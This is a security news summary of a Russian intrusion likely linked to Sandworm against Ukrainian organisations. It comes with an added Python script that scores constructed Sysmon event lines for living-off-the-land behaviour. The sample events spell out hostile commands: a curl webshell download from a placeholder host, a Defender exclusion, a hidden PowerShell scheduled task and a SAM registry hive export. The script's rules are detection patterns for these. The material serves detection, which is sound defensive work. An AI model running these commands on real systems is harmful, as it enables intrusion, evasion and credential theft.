Russian hackers, likely linked to Sandworm, exploit legitimate tools against Ukrainian targets
Russian threat actors, likely linked to the APT Sandworm, targeted Ukrainian organizations to steal sensitive data and maintain long-term network access, Symantec Threat Hunter Team and Carbon Black report. The attackers infiltrated a major business services firm for two months and a local government for a week, using living-off-the-land tactics and dual-use tools with minimal malware to evade detection.
Hackers exploited unpatched vulnerabilities to plant webshells like Localolive on servers. Microsoft previously linked Localolive to the Russian cyber espionage group Sandworm, which used it for initial access. The custom webshell enables C2, file uploads, and command execution.
Symantec observed that first intrusion signs began on June 27, 2025, when attackers installed a webshell via curl and ran reconnaissance (whoami, tasklist, systeminfo, domain queries). They disabled Defender scans for the Downloads folder, created scheduled tasks to dump memory (to harvest credentials), and exported registry hives.
The Threat Hunter Team observed a second webshell starting from June 29, enabling further discovery and lateral movement to other hosts. On subsequent days, attackers enumerated files and processes (targeting KeePass), created recurring minidump tasks, and used rdrleakdiag for full memory dumps. Attackers ran suspicious executables from Downloads (service.exe, cloud.exe), executed a dotnet-install script, and deployed OpenSSH alongside enabling RDP and adding firewall rules, including one for SSH. The threat actors installed a persistent PowerShell backdoor scheduled every 30 minutes, executed an unknown Python payload, and used a legitimate winbox64 utility. Activity tapered, with the last observed malicious actions on August 20.
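Nearly every step in the timeline above is a living-off-the-land action that leaves a process-creation record rather than a malware sample, so detection has to key on behaviour: a web server worker spawning reconnaissance tools, a Defender exclusion being added, a recurring scheduled task launching hidden PowerShell, rdrleakdiag or registry hive exports, and executables launched from Downloads. The script below is an added illustration written for this summary; it is not code from Symantec, Carbon Black or the article, and the Sysmon-style event lines it scans are constructed to mirror the described behaviours, not taken from the report. The rule names, weights and the threshold are the author's own assumptions for the demo.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample telemetry: Sysmon event ID 1 (process creation) records
# flattened to one line each. NOT taken from the Symantec report; they only
# mirror the behaviours the article describes. Hostnames/paths are placeholders.
SAMPLE_EVENTS = [
    r"Image: C:\Windows\System32\curl.exe | CommandLine: curl.exe -o C:\inetpub\wwwroot\update.aspx http://EXAMPLE-PLACEHOLDER/update.aspx | ParentImage: C:\Windows\System32\inetsrv\w3wp.exe",
    r"Image: C:\Windows\System32\whoami.exe | CommandLine: whoami | ParentImage: C:\Windows\System32\inetsrv\w3wp.exe",
    r"Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | CommandLine: powershell Add-MpPreference -ExclusionPath C:\Users\svc\Downloads | ParentImage: C:\Windows\System32\cmd.exe",
    r'Image: C:\Windows\System32\schtasks.exe | CommandLine: schtasks /create /tn Updater /sc minute /mo 30 /tr "powershell -w hidden -f C:\Users\svc\Downloads\u.ps1" | ParentImage: C:\Windows\System32\cmd.exe',
    r"Image: C:\Windows\System32\rdrleakdiag.exe | CommandLine: rdrleakdiag.exe <arguments omitted> | ParentImage: C:\Windows\System32\cmd.exe",
    r"Image: C:\Windows\System32\reg.exe | CommandLine: reg save HKLM\SAM C:\Users\svc\Downloads\sam.hiv | ParentImage: C:\Windows\System32\cmd.exe",
    r"Image: C:\Users\svc\Downloads\service.exe | CommandLine: service.exe | ParentImage: C:\Windows\System32\cmd.exe",
    r"Image: C:\Windows\System32\notepad.exe | CommandLine: notepad.exe report.txt | ParentImage: C:\Windows\explorer.exe",
]


@dataclass(frozen=True)
class Rule:
    name: str
    pattern: re.Pattern
    weight: int  # assumed weight; higher = stronger signal on its own


# Behavioural rules keyed to the timeline in the article. Field-anchored
# patterns ("^Image:", "ParentImage:") keep a match from leaking across fields.
RULES: List[Rule] = [
    # IIS worker spawning anything interactive is the classic webshell tell.
    Rule("webserver_child_process", re.compile(r"ParentImage: [^|]*\\w3wp\.exe", re.I), 3),
    # Host/domain reconnaissance commands seen after initial access.
    Rule("recon_command", re.compile(r"CommandLine: (whoami|tasklist|systeminfo|net (user|group)|nltest)\b", re.I), 1),
    # curl writing into the web root (webshell drop via curl).
    Rule("curl_download_to_webroot", re.compile(r"curl(\.exe)?\s+.*-o\s+\S*\\wwwroot\\", re.I), 3),
    # Defender exclusion added (Downloads folder excluded from scanning).
    Rule("defender_exclusion_added", re.compile(r"(Add|Set)-MpPreference .*-Exclusion(Path|Process|Extension)", re.I), 3),
    # Recurring minute-granularity task (30-minute PowerShell backdoor, minidump tasks).
    Rule("recurring_minute_task", re.compile(r"schtasks(\.exe)? .*/create .*/sc minute", re.I), 2),
    # Hidden-window PowerShell in any command line.
    Rule("hidden_powershell", re.compile(r"powershell(\.exe)?\s.*-w(indowstyle)?\s+hidden", re.I), 2),
    # Built-in leak diagnostic tool abused for full memory dumps.
    Rule("lolbin_memory_dump", re.compile(r"^Image: [^|]*\\rdrleakdiag\.exe", re.I), 3),
    # Credential-bearing registry hives exported to disk.
    Rule("registry_hive_export", re.compile(r"reg(\.exe)? (save|export) .*HKLM\\(SAM|SECURITY|SYSTEM)\b", re.I), 3),
    # Executables launched directly from a user's Downloads folder.
    Rule("exec_from_downloads", re.compile(r"^Image: [^|]*\\Downloads\\[^\\|]+\.exe", re.I), 2),
]


def match_rules(event: str) -> List[str]:
    """Return the names of every rule whose pattern occurs in the event line."""
    return [rule.name for rule in RULES if rule.pattern.search(event)]


def score_event(event: str) -> int:
    """Sum the weights of all matching rules; higher means more review-worthy."""
    matched = set(match_rules(event))
    return sum(rule.weight for rule in RULES if rule.name in matched)


def triage(events: List[str], threshold: int = 2) -> List[Dict]:
    """Return events scoring at or above threshold, most suspicious first.

    Ties keep input order, so an analyst reads them in timeline order.
    """
    hits = []
    for idx, event in enumerate(events):
        score = score_event(event)
        if score >= threshold:
            hits.append({"index": idx, "score": score, "rules": match_rules(event)})
    hits.sort(key=lambda hit: hit["score"], reverse=True)
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"event {hit['index']}: score {hit['score']} -> {', '.join(hit['rules'])}")
```

Because the rules are additive, the curl-from-w3wp and whoami-from-w3wp lines rank highest even though each individual command is benign on its own; that is the point of scoring the parent/child relationship rather than the tool. In production the same logic would sit in a SIEM correlation rule keyed on the host and a time window, so the minidump task, the hive export and the Downloads execution on one machine roll up into a single alert.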
To read the complete article see: Security Affairs.